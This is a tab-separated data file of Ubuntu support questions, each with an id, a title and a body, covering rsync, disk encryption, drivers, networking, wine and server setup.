431678	rsync two existing directories copying everything	i have two file servers in two locations . currently both have the same data , which generally is unmodified ( used for read only access ) .when the second server was set up ( the one i 'm sshing to ) the data was copied over lan and has since been moved geographically . i 'm trying to use rsync for the first time on the required directories . an example command ; sudo rsync -avz -- ignore-existing -p -- dry-run /media/storage/oss/ user @ mydomain : /mnt/storage/oss/ i 've tried using -c -t -u ( additionally went on the remote server and updated the timestamps to today ) also but every time i execute a dry run it wants to copy everything ! additionally the user is the same for both machines with the same uid . *edit after playing around a bit more , i 've found that rsync does not like the whitespace in the subdirectory names ; for instance if i use ' to escape local shell & \ to escape remote shell sudo rsync -avz -- ignore-existing -p '/media/storage/oss/windows/windows server 2011/ ' 'user @ mydomain : /mnt/storage/oss/windows/windows\ server\ 2011/' then all is well , my theory is then that rsync does not like the subdirectories with whitespaces . i have thousands of subdirectories ; the only solution i can think of is to write a small python/shell script to run each sub directory separately but is undesirable .
431680	is disk utility encryption the same as dm-crypt ?	i have found the following 2 minute video which shows how to encrypt a usb drive using ubuntu 's disk utility app : http : //www.youtube.com/watch ? v=j_g-w6hrkna my question is , is that method using dm-crypt , or some other technique for encrypting the drive ?
431681	when i input `` sudo apt-get update '' , i get an w & & e . i 've tried many methods but failed to solve it .thanks for help me	w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.oschina.net_ubuntu_dists_saucy-updates_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
431682	how do i use /etc/network/interfaces instead of network-manager	i have 12.04 desktop installed , how do i uninstall network-manager and set /etc/network/interfaces as the default file to resolve my network connections ?
431684	how can i find the progid of a windows program to use in wine ?	you can open documents in particular programs in wine from the terminal using wine start /progidopen < progid > < document_to_open > this format is necessary , since calling wine programs in alternative ways will not open the document . e.g . the following launch the application , but do not open the document . /path/to/prog.exe < document_to_open > wine /path/to/prog.exe < document_to_open > however , it 's not obvious how to find the < progid > associated with each program . how can i find this information ?
431686	how lubuntu is reinstalled using a live cd	i am using lubuntu 13.10 . i have troubles with this installed one and there is some break up . disk driver is disappeared . i would like to reistall the same from the live cd . but when i tried to boot from the live cd it directly go to the same root without giving an opportunity to reinsatll it . kindly give instructions to reistall from the live cd . thanks in advance
431687	xubuntu no workspaces	i removed xubuntu top panel by mistake , and then restored it using this answer , but now i ca n't see workspaces , tried to add them from settings , did n't work . i 'm on xubuntu 13.10 64 bit xfce 4.11
431690	13.10 onscreen keyboard suddenly stopped working	my onscreen keyboard suddenly stopped working . i click with mouse but it 's not writing any more . not sure where is the problem .
431694	changing windows c drive to create more partitions	hi actually my problem is very specific . i have four primary partitions system 100mb - system which create while installing win 7 windows c drive -820 gb where my windows 7 is installed ubuntu - 90 gb where ubuntu 13.10 is installed swap partition - for ubuntu all above are primary i want to make one more partition in windows but this current situation does n't allow me to do it . i do not want to delete any os . please help ! ! !
431698	ubuntu 12.04 nvidia underscan issues with my led tv	im pretty new to ubuntu/linux but i pretty enjoy it so far.i just got 1 problem so far wich i cant fix.i bought myself a 40inch tv ans use it primary as my monitor . i have a gforce 520 and running the nvidia driver for linux , wich works pretty well , no big problems so far.but everytime i boot up my ubuntu i have to go into the config ui ( via nvidia-settings ) and set the underscan vallue to like 43 or something.when im at the `` login screen '' of ubuntu ( before gnome loads ? ) , where u have to type in your password , everything is fine ! the screen just fits perfectly as it should be , but when i log in and load up gnome ( same on kde ... ) the screen kinda `` overextends '' to the bottom and the right side , so when i go to the right or bottom edge of the screen with my mouse the screen moves everytime.then , as said , i have to go back to the nvidia-settings and set the vallue of underscan to something about 43,47 and then its fine.what makes me curious is : when i start the nvidia-settings the vallue of underscan is allready at the vallue i`ve set before ! so i simple go a lil bit back and for and click apply.i tryed to edit the /etc/x11/corg.conf file , as also the nvidia config file in my home dir.i went trough the man pages , ive serched the web but i cant find any solution to fix this.even a simple terminal command wich i could add to a shellscript wich i allways run on startup would be a solution for me ! i would realy be happy if someone could help me out with this : - )
431702	ubuntu one password forgotten	i was trying to activate ubuntu-one on ubuntu 12.04 lts . after all entries were completed the system replied that e-mail has already been used . i remembered that some years back i tried ubuntu on my system and may have created a ubuntu-one account . i do n't have password which i used at that time . help .
431703	how to add `` open with custom command '' option in right click menu of nautilus	sometimes while going to open a file from nautilus i do not find the intended application in `` open with '' menu on right click . or the desired application remains hidden in a long list of applications . it becomes difficult to find it quickly . prior to ubuntu 11.04 there was a nice feature `` use a custom command '' under `` open with '' menu on right click on a file . one could able write a command in the box to open a file with a custom application . this option is no longer available in nautilus after ubuntu 10.10 . question : can i have a similar `` use a custom command '' dialogue box on nautilus so that i can open a file writing any custom command in a box as shown in the above picture ?
431705	ecryptfs mounts as read only	i did the following ( http : //haridas.in/how-to-put-encrypted-contents-on-cloud-storages.html ) , and after mounting , the mounted dir is read-only filesystem : i created two dirs : one to /home/user/dir1 and /home/user/dropbox/dir2 . then : mount -t ecryptfs /home/user/dropbox/dir2 /home/user/dir1 selected : aes/16 bytes/plaintext passthrough yes/filename encryption no created /root/.ecryptfsrc file with following content : key=passphrase : passphrase_passwd_file=/home/user/.ecryptfs/passphrase.txt ecryptfs_sig=mysighere ecryptfs_cipher=aes ecryptfs_key_bytes=16 ecryptfs_passthrough=y ecryptfs_enable_filename_crypto=n created file /home/user/.ecryptfs/passphrase.txt with content : passphrase_passwd=mypassphrase added line to /etc/fstab : /home/user/dropbox/dir2 /home/user/dir1 ecryptfs defaults 0 0 and now the dir2 and dir1 are read only filesystem . what should i do to change them to mount as read-write filesystem ? when i add the line to fstab , the filesystem mounts as it should , but when system boots , it 's mounted as a read-only filesystem .
431706	ubuntu on acer e1-510	so i have an acer e1-510-2821 computer i recently purchased at walmart . the computer came pre-installed with windows 8.1 . the system of course is uefi , and unfortunately has no legacy bios mode . i have tried ubuntu 12.04 , ubuntu 13.10 , and kubuntu 13.10 and , each will show the grub bootloader and allows me to enter my boot parameters if i want . i have tried noapic , nolapic , and of course nomodeset , yet each time the computer only goes to a black screen . i have noticed however that in the case of kubuntu , it actually showed the installer and allowed me to choose `` try ubuntu '' or `` install ubuntu '' , however as soon as i click try it only goes to a black screen like all the rest . this is the only environment however that i even seen an active mouse . i did not try clicking install kubuntu as i do not want to install if i can not get it to run . i tried removing quite splash and it showed the kernel booting , and each time after booting it would simply show the prompt rather than go to a desktop . if i run sudo service lightdm start then it just goes to the black screen again . the system has an intel celeron quad core cpu n2920 with integrated graphics , so it 's not a proprietary graphics card . any help to get this running ubuntu would be appreciated , as i hate windows 8 . thanks !
431707	ubuntu + svn : could not open the requested svn filesystem	i have run through the below steps to create an svn repository on ubuntu : 1- sudo apt-get install subversion apache2 libapache2-svn 2- sudo a2enmod ssl 3- sudo mkdir /etc/apache2/ssl 4- sudo openssl req -new -x509 -days 365 -nodes -out /etc/apache2/ssl/apache.pem -keyout /etc/apache2/ssl/apache.key 5- sudo nano /etc/apache2/ports.conf and added this namevirtualhost *:443 listen 443 6- sudo nano /etc/apache2/sites-available/default-ssl and comment out the default certificate and key : # sslcertificatefile /etc/ssl/certs/ssl-cert-snakeoil.pem # sslcertificatekeyfile /etc/ssl/private/ssl-cert-snakeoil.key and add : sslcertificatefile /etc/apache2/ssl/apache.pem sslcertificatekeyfile /etc/apache2/ssl/apache.key 7- sudo a2ensite default-ssl 8 - sudo /etc/init.d/apache2 restart 9- configure the svn server for this , make a directory where you want to keep the svn repositories and edit the dav_svn.conf file : sudo mkdir /svn sudo nano /etc/apache2/mods-enabled/dav_svn.conf delete all the data and make it simple like this : < location /svn > dav svn svnparentpath /svn authtype basic authname `` subversion repository '' authuserfile /etc/apache2/dav_svn.passwd require valid-user sslrequiressl < /location > 10- sudo htpasswd -cm /etc/apache2/dav_svn.passwd myusername type the new password . 11- cd /svn sudo svnadmin create myrepo 12- sudo chown -r www-data : www-data /svn 13- sudo /etc/init.d/apache2 restart when i open the url : https : //xxx.xxx.xxx.xxx/svn/myrepo it asked for username and password -- > success to login but it gave me this : this xml file does not appear to have any style information associated with it . the document tree is shown below . < d : error xmlns : d= '' dav : '' xmlns : m= '' http : //apache.org/dav/xmlns '' xmlns : c= '' svn : '' > < c : error/ > < m : human-readable errcode= '' 2 '' > could not open the requested svn filesystem < /m : human-readable > < /d : error > any idea why am getting this error ? thanks
431709	problem setting the default wired connection	i have three wired connections setting saved . i would like to have connection_1 as my default setting whenever i log-in . how can i do that ? thanks
431711	ubuntu wo n't boot + i have no usb boot option anymore	i have installed ubuntu on my laptop as the only os . and i was messing around with mounting an usb ( something like 'ubs0 ' ) and now my laptop wo n't boot anymore into ubuntu and the usb boot option disappeared from the bios . i would like to re install ubuntu 12.04 but my cd/dvd-drive is broken and i do n't have an usb option anymore . is there a way to completely format all the partitions and maybe get my usb boot option back ? ps : i also ca n't boot into safe mode .
431713	changing decimal separator in existing columns in libreoffice calc	in libreoffice calc , if i have a column with a lot of numbers in this format 8,1 ( comma ) , how can i transfer all these numbers to the format 8.1 ( dot ) ? when i say `` a lot '' i mean thousands of numbers , so it is just impossible to rewrite it again in the right format .
431714	xdotool key xf86audiomute/raisevolume/lowervolume not working	decided to open this question after a days worth of googling around related posts/guides/etc . to no avail . in ubuntu 12.04 the media keys stopped working for a particular user account although they work for another account in the same system . the strange thing is that not even the command xdotool key xf86audiomute works ( same with xf86audioraisevolume and xf86audiolowervolume ) . the key as well as the command xdotool key xf86calculator is working fine . my conclusion is that the problem is not that keys are not sending the signal , but that the actual action is not executed for some reason . running xbindkeys -k produces no output , but then again the xf86calculator key that works is also not recognised by xbindkeys . i guess that means that these keys are consumed by the system , thus never reaching xbindkeys to be recognised . same story with xev that produces the following ( same output for any key ) : focusout event , serial 33 , synthetic no , window 0x5400001 , mode notifygrab , detail notifyancestor focusin event , serial 33 , synthetic no , window 0x5400001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 33 , synthetic no , window 0x0 , keys : 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 could you please help ?
431717	format usb stick using lvm ?	is it possible to format a usb stick using lvm ? i am interested in lvm because apparently it allows you to create instantaneous snapshots for backup purposes .
431719	how to remove/uninstall a package in ubuntu via command line ?	what is an exact command to remove/uninstall a package in ubuntu via command line . i want to know how to completely uninstall a package in ubuntu ?
431720	ubuntu 13.10 does not recognize the nvidia gpu	every time it 's the same . i tried many ways to install the nvidia drivers on my laptop . every time i get a black screen or 640x480 mode . i tried bumblebee , but it did n't work too . the command : lspci gives the result ( nvidia card is on the bottom ) : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.1 pci bridge : intel corporation lynx point-lp pci express root port 2 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5227 ( rev 01 ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 10 ) 08:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 09:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) looking forward for an answer .
431723	libre office calc - small sheet toolbar ?	is there any possible way to enlarge this toolbar where sheets are listed ( sheet 1 , sheet 2 , sheet 3 , ... ) ? see the below screenshot : in my case , these cards are so small that it 's barely possible to click on it . please help !
431726	help for editing screenlets widgets from the sexisting configuration file	i have been using screenlets widgets but their i have some idea about a widget i want to add some new features to it and want to distribute it . how to find the files related the widgets .
431728	ubuntu 12.10 does not boot properly	i have ubuntu 12.10 running on hp probook 4430s . i have been using it more than a year . this morning i switched it on , the screen got stuck before it boots - it was black and white terminal like screen with messages like kernel threads needs to be stopped etc . i waited but nothing happened . i forcibly shut it down and restarted it . this time it showed me a menu with options 1 ) ubuntu 2 ) advanced ubuntu options 3 ) memory test . this screen has never showed up earlier and it would directly boot ubuntu . next when i chose ubuntu , it did n't boot and got stuck in the same screen with as earlier . i tried again this time with advanced ubuntu options and it showed many kernel versions with recovery mode for each . i chose an older version and it booted eventually but not normally as it used to . i have only ubuntu installed and no other os . why is this happening ? what shall i do make my system boot normally as it used to ? i have lots of data and ca n't afford a fresh installation . shall i choose to upgrade to 13.10 which the software updater shows ?
431730	12.10 - not appear top bar , left bar and compiz closed unexpectly	i 'm sorry , my english is not good . i 'm trying to start ubuntu after the 12.10 upgrade , but appeared a black screen with a _ white . now , after read some questions here , i got start recovery mode and install some functions or drivers . i can login but the top bar , the left panel and the title bar ( including minimize , maximize and close ) dissapeared , and appear a message like `` compiz has closed unexpectly '' . and the thunderbird window blinks repeatly . thanks .
431731	understanding the gui environment / video card drivers	i hope this is n't too off-topic ... .my experiences with ubuntu have been really great , but i 've fallen into a pattern where either something works great by default ( which is awesome ) , or it does n't . when it does n't , i google the problem and randomly copy/paste solutions until it works . if it does n't work , i give up and move on or start over with a new distro . i was unable to get my video card to work in 13.10 - i reinstalled with 12.04 . now it works great ! through this trial and error - i can now proudly say that ubuntu does everything i need my pc to do . it 's great ! i absolutely love it - but i do n't understand anything i 've done . when i try to search for information , it tends to be too specific . 'paste this and it should work ! ' can someone help me understand , or point me to a place to start reading , that covers things like how the video system works , how/where the drivers are loaded , what troubleshooting stuff is available , how to reinit the drivers without rebooting ( if that 's possible , i 've heard you never need to reboot ubuntu ) . can i have my machine not start the ui at all , and then manually start it ? is it a single program , or is it more like a service that is part of the os . if this is too vague a question , my apologies .
431732	bad opengl performance when running the game windowed	i 'm playing dust racing 2d ( https : //sourceforge.net/projects/dustrac/ ) on ubuntu 13.10 . the problem is that the performance is bad when running the game in a window . the fullscreen mode is perfectly smooth , though . my pc has a rather new nvidia 's gtx 650 graphics card with proprietary drivers . why i 'm asking this is that the game runs at 60 fps windowed on my slower ubuntu 12.04 laptop , which has intel 's integrated hd 3500 ! the gtx 650 should be insanely fast compared to hd 3500 . is there anything i could do to this ? could it be that intel 's drivers just work better with unity and qt ( the game uses qt ) ? regression after 12.04 ?
431734	ubuntu in israel ?	is it possible to use ubuntu in israel ? someone in israel would use the hebrew keyboard and probably the hebrew calendar . is it therefore possible to use the hebrew calendar in ubuntu ? is it possible to write hebrew from right to left ?
431736	going back to windows	so i got a usb with a windows iso on it . and everything . and when i tried to boot from it , it does n't show up on my boot menu ? i really am over linux , and its so complicated , and i ca n't stand working with it . so the easiest and quickest way to get to windows again . thanks ! :3
431739	unity laucher resize bug	hello i just installed ubuntu 12.04 and installed the updates that was available . i have used ubuntu 12.04 before with no problem but now i want to make the icon size on the unity launcher smaller . i go to `` system settings > apearance '' . there should be a setting to change the size of the icons there but after the update i can only change resolution and background . i can not change the icon size . is there a way to fix this bug or do i have to reinstall ubuntu ? my unity version is : unity 5.20.0 if this is unity 2d is there a way to install unity 3d ?
431740	could i really have lost the `` unity '' plugin ?	so after some input on a problem i had involving my notification bar & launcher disappearing , i tried all of the recommendations on what to do . well , besides losing all my `` custom '' desktop settings and behaviors i also came to the conclusion that in ccsm where i was told i 'd be able to find the option of enable/disabling the unity plugin to my surprise i do n't have one . i believe it 's the problem . anyone have an extra one i can borrow ?
431744	how to change individual speaker volumes from cli ?	i can change overall volume of an audio sink with pacmd set-sink-volume from the cli , but that changes the volume of all speakers . i 'd like to only mute the rear speakers on a 5.1 setup for music listening . how can i do this with from cli ?
431750	lubuntu dual monitor does n't save config	i 'm using lubuntu and i have a external monitor ( connected using hdmi ) to my laptop . everytime i enter on lubuntu , both laptop and monitor are turned on . what i do : i go to menu > preferences > monitor settings and i disable the laptop monitor , i click on apply and i do the same process again but i click on save his time , just to be sure . http : //s7.postimg.org/s0fnce4cr/display_settings_001.jpg i want to use only the external monitor , i do n't want to use the laptop 's screen . but this process is not working , because when i restart or turn the laptopn on again , both screens are turned on again ... seems that it 's not saving my config . is there a way , maybe editing a file , to save this config ? thanks !
431751	is it wise to run computing virtual machines on kvm ?	i have a physical server with 384gb memory . my main applications are to run cpu and i/o intensive programs . i could run everything on the physical server . but i 'm wondering if it is better to host a virtual machine on the physical server to simplify future system restoration issues . for example , if the physical server crashes , i can still grab the image of the virtual machine and run it somewhere else . if most of my applications are installed in the virtual machine , then few applications shall be installed on the physical machine . it sounds this strategy can make the system restoration much easier . also , when i want to duplicate the system configuration , i just need to make a copy of the image of the virtual machine . on the other hand , running processes on a virtual machine is slower than running on a physical machine . and since i have a large memory , the swap space for the virtual machine is also large ( should it be 384gb ) and is not based on a physical partition . i think that this can cause performance issues . could any experienced users provide some recommendations on whether it is wise to run virtual machines for computing purposes ? thanks .
431758	broadcom wireless for compaq 615 on ubuntu 12.04.4 lts	i have a problem where after recent updates my wifi stopped working . i can detect my wireless network but when attempting to join it the wifi icon in the task bar just 'rolls ' the wifi signal indicator up and down and never actually connects . it would often ask for the password a few times . i 've tried changing the wifi password , restarting the machine , disabling/enabling the wifi adapter , but nothing seems to be working . i can see the network but just ca n't connect . please help . how can i fix this . i am using : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) the 14e4 was orange/red in the report , not sure if that means something ? anyone know i can can get my laptop to actually connect to the wifi again ?
431762	how to use expanded disk space in ubuntu after running vboxmanage modifyhd command of virtual box	i am running ubuntu 64 server ( 12.04.04 ) in virtual box . i increased the disk size to 80 gb using vboxmanage modifyhd command . in virtualbox manager i see the following under storage : controller : sata sata port 0 : ubuntu64amd.vdi ( normal , 78.13gb ) in ububtu , system manager 's file system tab shows the following : device directory type total free available used /dev/mapper/ubuntu64-root / ext4 5.6gib 690.3mib 397.1 mib 5.0 gib 92 % /dev/sda1 /boot ext2 227.7mib 152.9mib 140.7 mib 74.8mib 34 % i am trying to install netbeans but get following message : insufficient disk space for proper installation . additional 159.5 mb is required in / i thought since i increased the disk size , any needed space will be dynamically allocated . what else i need to do to use the 78.13gb space ? thanks !
431766	ubuntu touch date picker html5	i 'm working on an app for ubuntu touch in html5 but im wondering what components i should use for a date or time picker . i 've asked it a couple of times on irc but never got an answer greetz justcarakas
431767	libc6-amd64 dependency problem while installing autodesk aldmflexnetserver	command sudo dpkg -i adlmflexnetserver_7.0.51-1_amd64.deb log unpacking adlmflexnetserver ( from adlmflexnetserver_7.0.51-1_amd64.deb ) ... dpkg : dependency problems prevent configuration of adlmflexnetserver : adlmflexnetserver depends on libc6-amd64 ( > = 2.3.2 ) . dpkg : error processing adlmflexnetserver ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : adlmflexnetserver any ideas , about libc-amd64 , how to find or fix etc deb file is prepared for rpm using alien i m on ubuntu 13 , x64 thanks , lala
431770	how to unistall a program installed by a .sh installer ?	i downloaded a .sh program ( in this case is a game ) and then i installed using `` sh name.sh '' ( or maybe it was `` bash name.sh '' . i do n't remember quite well , but i guess it has no importance in this case : p ) . everything worked as planned . the .sh created a folder in /usr/local/games/ and from there i can run the game from a .bin ( i created a `` link to application '' in my desktop to run it faster ) . so far so good , but now i want to remove/uninstall the game but i do n't know how ( i guess that neither apt-get or dpkg work in this particular case . correct me if i 'm wrong ) . so my question is , how can i remove/unistall this game ? tyvm in advance for any reply . edit i tried to open and read the .sh ( actually , it was the first thing i did ) , but when i open it , the editor ( kate in this case ) warns me with the following message : the file /home/user/games/name/name.sh was opened with utf-8 encoding but contained invalid characters . it is set to read-only mode , as saving might destroy its content . either reopen the file with the correct encoding chosen or enable the read-write mode again in the menu to be able to edit it . and when i try to do anything , such as find or select something , my computer gets numb and 'overloaded ' and it does n't let me do anything ( almost as a freeze ) , and since the code is big i ca n't just read line by line until i find the part ( s ) i 'm looking for . the folder that was created when installed ( in /usr/local/games/ ) has the following : name.bin.x86_64 name.png readme.linux xdg-utils ( folder ) xdg-desktop-menu name.dat lib64 ( folder ) libfreeimage.so.3 libminizip.so.1 libsdl2-2.0.so.0 xdg-open i guess that xdg-desktop-menu is used in this case to uninstall the game since when i type in the terminal : `` xdg-desktop-menu -- help '' , one of the lines says : xdg-desktop-menu uninstall [ -- noupdate ] [ -- mode mode ] directory-file ( s ) desktop-file ( s ) but i 'm not sure how to use it . have someone used something like this ? or based in the line above , in this case , what should i type ?
431773	installing tomcat5.5 from source	i want to install php/java bridge . i installed tomcat7 for it , but it failed : sudo dpkg -i /home/asif/jbridge/php-java-bridge-j2ee_5.4.4.2-3_all.deb selecting previously unselected package php-java-bridge-j2ee . ( reading database ... 190386 files and directories currently installed . ) unpacking php-java-bridge-j2ee ( from ... /php-java-bridge-j2ee_5.4.4.2-3_all.deb ) ... invoke-rc.d : unknown initscript , /etc/init.d/tomcat5.5 not found . dpkg : error processing /home/asif/jbridge/php-java-bridge-j2ee_5.4.4.2-3_all.deb ( -- install ) : subprocess new pre-installation script returned error exit status 100 invoke-rc.d : unknown initscript , /etc/init.d/tomcat5.5 not found . dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 100 errors were encountered while processing : /home/asif/jbridge/php-java-bridge-j2ee_5.4.4.2-3_all.deb see it says : /etc/init.d/tomcat5.5 not found . so i want to install tomcat5.5 but jakarta is no more active . so i got tomcat5.5 from apache archives ( http : //archive.apache.org/dist/tomcat/tomcat-5/v5.5.12/src/ ) . i have downloaded apache-tomcat-5.5.12-src.zip and now : i do n't know how to install it . how can i ?
431775	why bonding does not improve network speed ?	i have the following content in /etc/network/interfaces on one of my server ( say server1 ) . on another server ( say server2 ) . the content of /etc/network/interfaces is similar . except that the mac addresses are changed accordingly and the ip address is changed to 192.168.2.2 . ubuntu 13.10 is installed on both servers . but when i use iperf -s on server1 and iperf -c 192.168.2.1 to test the speed . i only get around 10gbps speed ( the speed of a single nic ) . my switch is configured as a layer 2 switch . does anybody know how to make the speed to be 20gbps through bonding ? thanks . auto em1 iface em1 inet manual hwaddress ether c8:1f:66 : e2:90:43 bond-master bond0 auto em2 iface em2 inet manual hwaddress ether c8:1f:66 : e2:90:45 bond-master bond0 auto bond0 iface bond0 inet static address 192.168.2.1 netmask 255.255.255.0 network 192.168.2.0 bond-mode 4 bond-miimon 100 bond-lacp-rate 1 bond-slaves em1 em2 the output of iperf is the following . server2 : ~ $ iperf -s -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- server listening on tcp port 5001 tcp window size : 85.3 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.2.2 port 5001 connected with 192.168.2.1 port 34014 [ id ] interval transfer bandwidth [ 4 ] 0.0-10.0 sec 11.0 gbytes 9.41 gbits/sec server1 : ~ $ iperf -c 192.168.2.2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- client connecting to 192.168.2.2 , tcp port 5001 tcp window size : 22.9 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.2.1 port 34014 connected with 192.168.2.2 port 5001 [ id ] interval transfer bandwidth [ 4 ] 0.0-10.0 sec 11.0 gbytes 9.41 gbits/sec i also tried to change the mode to balance-alb and balance-rr . but they do n't lead to improved performance as well . does anybody know to debug the problem ? thanks . auto bond0 iface bond0 inet static address 192.168.2.1 netmask 255.255.255.0 network 192.168.2.0 # bond-mode balance-rr bond-mode balance-alb bond-miimon 100 bond-slaves em1 em2
431778	login screen do n't accept my valid password ?	after typing in my password , which i am sure is valid and spelled correctly , ubuntu redirects me to the login screen again and again . i do n't get the usual 'incorrect password ' notice or any other error message that might explain this behavior . please help .
431779	clean install with pre-existing full disk encryption ?	there is a good chance i 've missed this somewhere so i apologize in advance if i have . also , this may be some sort of newb-ish quesion . i 've run into some problems after my upgrade from lubunu 13.04 to 13.10 and would like to perform a clean install . however , i have full disk encryption ( root , home , swap ) . it was done generically from the installer when i moved to 13.04 so the partitioning is : sda is boot , sda1 is extended and sda5 is crypt-luks , when viewed through gparted . what i 'm hoping for is a straight forward guide to performing a clean install of 13.10 ( or future releases ) for those of us who have full disk encryption . is there one already ? if so , where ? or , could someone please provide one so i do n't have to endure the bugs that are bugging me so much . there are a lot of guides out there about how to encrypt when installing for the first time or encrypting home after the fact . i 'm not looking for those types of guides and finding the information i need is proving awfully frustrating in itself . to avoid confusion : i am trying to cleanly re-install the os while maintaining the full disk encryption as one would do with a clean install but maintaining their /home partition .
431780	apt-get install vs pip install	i am a bit confused about the cases in which the above commands must be used when downloading python packages . i was trying to download a package named pyudev in accordance with an answer with this question . i executed this command : sudo pip install python-pyudev but received the following message : downloading/unpacking python-pyudev could not find any downloads that satisfy the requirement python-pyudev cleaning up ... no distributions at all found for python-pyudev storing complete log in /home/vineet/.pip/pip.log however the following worked fine : sudo apt-get install python-pyudev when is apt-get supposed to be used to install packages and when is python-pip used ?
431782	cant install `` additional driver ''	i uninstalled the `` additional driver '' app from the ubuntu software center . after that , when i tried reinstalling it , i am getting this error- package dependencies can not be resolved how can i reinstall it again ?
431785	how to install nvidia geforce4 mx440 drivers in lubuntu ( text mode ) ?	i am using lubuntu 13.10 32-bit on an old computer . i got the nvidia drivers for my geforce4 mx440 from the official nvidia site . now i am stuck . if i start the driver setup in lxde it says i need to stop the display manager . if i start the driver setup from the recovery mode , it says that the filesystem is read-only ( incredibly frustrating ) ! how to go into text mode so that i can install the drivers ? also , is there anything else i need to do ( like install some extra software ) ?
431786	xampp control panel does not starts because of pre installed mysql and apache server	recently i installed xampp for my ubuntu 13.10 , 32-bit . before sometime i had installed mysql and apache server individually to test few things . my problem : when i try to start mysql and apache from xampp control panel , it ca n't start because the reason is obvious , mysql and apache are already running ( i came to know this by service -- status-all ) . looking at this i tried surfing localhost for xampp user-interface but it did not started . i manually stopped the already running mysql & apache using service mysql stop & service apache stop . now i started mysql & apache from xampp control panel and its all running successfully . my question : mysql and apache are running on particular ports and these are universal services , then why ca n't xampp recognize it ? ? why do i need to stop explicitly and then start them from xampp control panel ? ? p.s - i do n't want to repeat this process everytime starting xampp , so please let me know the solution to this .
431787	what is this gnusetup folder ?	i am using ubuntu 12.04 lts and i opened the gui and noticed this folder called gnusetup and mail . here is a screenshot of it : inside gnusetup is library which is empty . and inside of mail is drafts and outbox
431790	how to set dll to native ( wine )	i 'm currently trying to setup mathcad14 on 13.10 using wine 1.7 . here are the instructions i 'm using . in there i 'm told to : set all dlls to native ( especially msvcm80.dll ) . i have no idea how to do this . can anyone explain ?
431791	remove ubuntu 12.04.4 from secondary drive	i am a novice and need help to solve the following . my computer . intel i5-4440 processor , intel db85fl motherboard , western digital wdc wd5000aakx-6 , 500 gb , primary disk with ubuntu 13.10,64bit , whole disk . seagate st3500418as , 500 gb , secondary with 12.04.4,64bit , whole disk . samsung syncmaster 943 and so on . in bios , the boot priority is as follows . dvd drive wd hdd seagate hdd usb internet on booting the system , ubuntu displays the option to boot from ubuntu , advanced options for ubuntu 13.10 , ubuntu 12.04.4 , advanced options for ubuntu 12.04.4 , and system setup i want to remove everything on the secondary seagate st3500418as , 500 gb , with 12.04.4 , to use it as my backup drive . but without affecting anything from western digital wdc wd5000aakx-6 , 500 gb , primary disk with ubuntu 13.10 . i have nearly 208gb data on this . please advice me .
431794	ubuntu will not go to login screen	i am a new user and i have been using ubuntu for a couple of weeks now . i shut the computer down yesterday and when i opened it this morning it got stuck at the loading screen with the dots . i tried opening grub by pressing shift and nothing happened . i do n't really know what else to do . if anybody could please help me solve this it would be greatly appreciated as i have some important files saved there .
431795	extreme difference in navigation speed between win7 and ubuntu 13.10	i have dual boot 13.10 and windows 7 . after the installation of the driver rtl8188ce in both ubuntu and windows , ubuntu holds the connection , unlike before . but there is a very big difference in navigation speed . what could be the problem and how can i fix it ?
431796	grub2 and windows 7 & vista	i would like to triple boot ... do n't ask why ; - ) ... i have ubuntu 13.10 and ghost copy of w7 and vista installation . would like to be able to boot all three os from the same partition . the problem is that it wont boot both the vista and 7 . i think the issue is related to the guid on the partition . and that systemreserved partition that both windows versions have . i would like to end up with grub2 managing all three oses but i do n't want windows ' own boot manager knowing and showing the other os in its boot menu . if i would start windows 7 then it will only boot it , same with vista .
431802	'mount : error while loading shared libraries : libudev.so.0 : no such file or directory '	i got this error while booting 'mount : error while loading shared libraries : libudev.so.0 : no such file or directory ' then i followed this i booted into recovery mode and opened terminal and installed libudev0 using apt-get install libudev0 it says its already installed even i linked libudev0 and libudev1 as mentioned here but no gain : ( edit : output of locate -e libudev.so.0 /lib/i386-linux-gnu/libudev.so.0 /lib/i386-linux-gnu/libudev.so.0.13.0 /lib/x86_64-linux-gnu/libudev.so.0.13.0
431805	would someone plese tell what section this is that i have outlined in red	i am attempting to edit this theme and have no idea what this section is . so i outlined it in red and would appreciate someone telling me what section it is . thanks the name of the section , i want the name of the section .
